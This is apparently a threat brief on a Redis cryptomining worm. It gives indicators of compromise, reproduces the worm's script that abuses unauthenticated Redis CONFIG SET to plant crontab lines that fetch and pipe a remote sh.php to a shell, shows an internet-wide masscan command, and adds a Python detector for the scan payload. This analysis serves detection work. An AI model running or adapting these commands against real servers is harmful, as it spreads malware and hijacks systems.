Threat brief: a Redis.Miner
IoC
Download servers
159.89.190.243
img.namunil.com
cdn.namunil.com
Download URLs
Mining program
hxxp://img.namunil.com/dump.db
hxxp://cdn.namunil.com/dump.db
SSH login key (authorized_keys entry)
/root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX
Scale estimate
- Scan scale: port 6379 ranks 14th (673 unique source IPs within 24 hours)
- The download servers still rank very low, well outside the top one million:
  - 0.327100 401126302 2018-03-23 cdn.namunil.com
  - 0.572953 174202964 2018-03-23 img.namunil.com
- Mining profit: unknown; the pool it uses, z.chakpools.com, is not a well-known pool and gave no response
Worm-style propagation
It delivers its payload through a Redis vulnerability (unauthenticated CONFIG SET dir/dbfilename followed by SAVE, which drops the RDB dump into a cron spool as a crontab, as the script below shows); the masscan used for scanning is downloaded and compiled by the malicious code itself.
# Build a redis-cli batch: flush the instance, store cron lines as values, then
# point dir/dbfilename at the cron spool so SAVE writes the dump as a crontab.
echo 'config set dbfilename "backup.db"' > .dat
echo 'save' >> .dat
echo 'flushall' >> .dat
# Each value is one crontab line that fetches sh.php and pipes it to a shell.
echo 'set jmTIabkD "\n*/2 * * * * curl http://cdn.namunil.com/sh.php|sh\n"' >> .dat
echo 'set yCEpdj "\n*/4 * * * * wget -O- http://cdn.namunil.com/sh.php|sh\n"' >> .dat
echo 'set cNaGUd "\n*/5 * * * * /usr/bin/curl -qs http://cdn.namunil.com/sh.php|/bin/sh\n"' >> .dat
echo 'set mKjzHoR "\n*/10 * * * * /usr/bin/wget -q -O- http://cdn.namunil.com/sh.php|/bin/sh\n"' >> .dat
# Written as /var/spool/cron/root (RHEL-style layout) ...
echo 'config set dir "/var/spool/cron"' >> .dat
echo 'config set dbfilename "root"' >> .dat
echo 'save' >> .dat
# ... and again as /var/spool/cron/crontabs/root (Debian-style layout).
echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
echo 'save' >> .dat
# Drop replies to the fixed scanner source port, scan one shard of IPv4 for
# Redis instances that answer +OK to the hello-string, and feed hits to redis-cli.
iptables -A INPUT -p tcp --dport 60000 -j DROP
masscan --banners --no-show open --shard 18499/20000 --source-port 60000 --hello-string[6379] "KjQNCiQ2DQpjb25maWcNCiQzDQpzZXQNCiQzDQpkaXINCiQxNQ0KL3Zhci9zcG9vbC9jcm9uDQo=" --max-rate 10000 -p6379 0.0.0.0/0 --exclude 255.255.255.255 2>/dev/null -oG - | awk '/+OK/ {print $2, $5}' | sort | uniq > .r1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw > /dev/null 2>&1 &
done < .r1
Proof that the malicious code and the recent port 6379 scans share a common origin
The malicious code contains the following masscan hello-string, and its source port is fixed to 60000:
$ echo KjQNCiQ2DQpjb25maWcNCiQzDQpzZXQNCiQzDQpkaXINCiQxNQ0KL3Zhci9zcG9vbC9jcm9uDQo= | base64 -d
*4
$6
config
$3
set
$3
dir
$15
/var/spool/cron
This is consistent with the scan payload we have recently observed on port 6379:
2018-03-23 14:23:54 redis sip=111.231.121.59 dip=- sport=60000 dport=65535 proto=tcp tcp.payload=eJzSMuHlUjHj5UrOz0vLTOflUjHm5SpOLYEwUjKLeLlUDE15ufTLEov0iwvy83P0k4vy83i5AAEAAP//WKwNdg== src=hp
$ fes -X eJzSMuHlUjHj5UrOz0vLTOflUjHm5SpOLYEwUjKLeLlUDE15ufTLEov0iwvy83P0k4vy83i5AAEAAP//WKwNdg==
>>>sha1: 38472e9bfbf6148a9e887ae8196b6b2d2e6005e0 plen:56
*4
$6
config
$3
set
$3
dir
$15
/var/spool/cron
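As an added example (not code from the brief), the check below parses the RESP request carried by the masscan hello-string and by the sensor log's tcp.payload field, and flags a CONFIG SET dir that points at a cron or ssh directory, the write primitive the script above relies on. It assumes tcp.payload is base64 over zlib (what the fes -X output implies); the hello-string and log line are the ones quoted on this page.

```python
import base64
import zlib

# Directories this miner writes into with CONFIG SET dir (the cron spools seen
# in its script) plus the ssh location it abuses through authorized_keys.
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron.d", "/root/.ssh")

# masscan hello-string found in the malicious code (quoted from the brief).
HELLO_STRING = "KjQNCiQ2DQpjb25maWcNCiQzDQpzZXQNCiQzDQpkaXINCiQxNQ0KL3Zhci9zcG9vbC9jcm9uDQo="

# Sensor log line for the matching scan (quoted from the brief). tcp.payload is
# assumed to be base64 over zlib, which is what the fes -X output implies.
LOG_LINE = ("2018-03-23 14:23:54 redis sip=111.231.121.59 dip=- sport=60000 dport=65535 proto=tcp "
            "tcp.payload=eJzSMuHlUjHj5UrOz0vLTOflUjHm5SpOLYEwUjKLeLlUDE15ufTLEov0iwvy83P0k4vy83i5AAEAAP//WKwNdg== src=hp")

def parse_resp_array(data: bytes) -> list:
    """Parse one RESP multi-bulk request: *N, then N bulk strings ($len, CRLF, bytes, CRLF)."""
    if not data.startswith(b"*"):
        raise ValueError("not a RESP array")
    end = data.index(b"\r\n")
    count, pos, args = int(data[1:end]), end + 2, []
    for _ in range(count):
        if data[pos:pos + 1] != b"$":
            raise ValueError("expected bulk string header")
        end = data.index(b"\r\n", pos)
        length, start = int(data[pos + 1:end]), end + 2
        if data[start + length:start + length + 2] != b"\r\n":
            raise ValueError("bulk string length mismatch")
        args.append(data[start:start + length].decode("utf-8", "replace"))
        pos = start + length + 2
    return args

def config_dir_target(args: list):
    """Return the path when args is CONFIG SET dir <sensitive path>, else None."""
    if len(args) == 4 and [a.lower() for a in args[:3]] == ["config", "set", "dir"]:
        if args[3].startswith(SENSITIVE_DIRS):
            return args[3]
    return None

def decode_hello_string(b64: str) -> list:
    """The masscan hello-string is plain base64 of the RESP request."""
    return parse_resp_array(base64.b64decode(b64))

def inspect_log_line(line: str) -> dict:
    """Decode tcp.payload from one key=value sensor log line and classify the command."""
    fields = dict(tok.split("=", 1) for tok in line.split() if "=" in tok)
    args = parse_resp_array(zlib.decompress(base64.b64decode(fields["tcp.payload"])))
    return {"sport": int(fields["sport"]), "command": args, "sensitive_dir": config_dir_target(args)}
```

Run against a full day of sensor lines, a non-None sensitive_dir together with sport 60000 is the signature this brief describes; a GET or PING decodes cleanly and yields None.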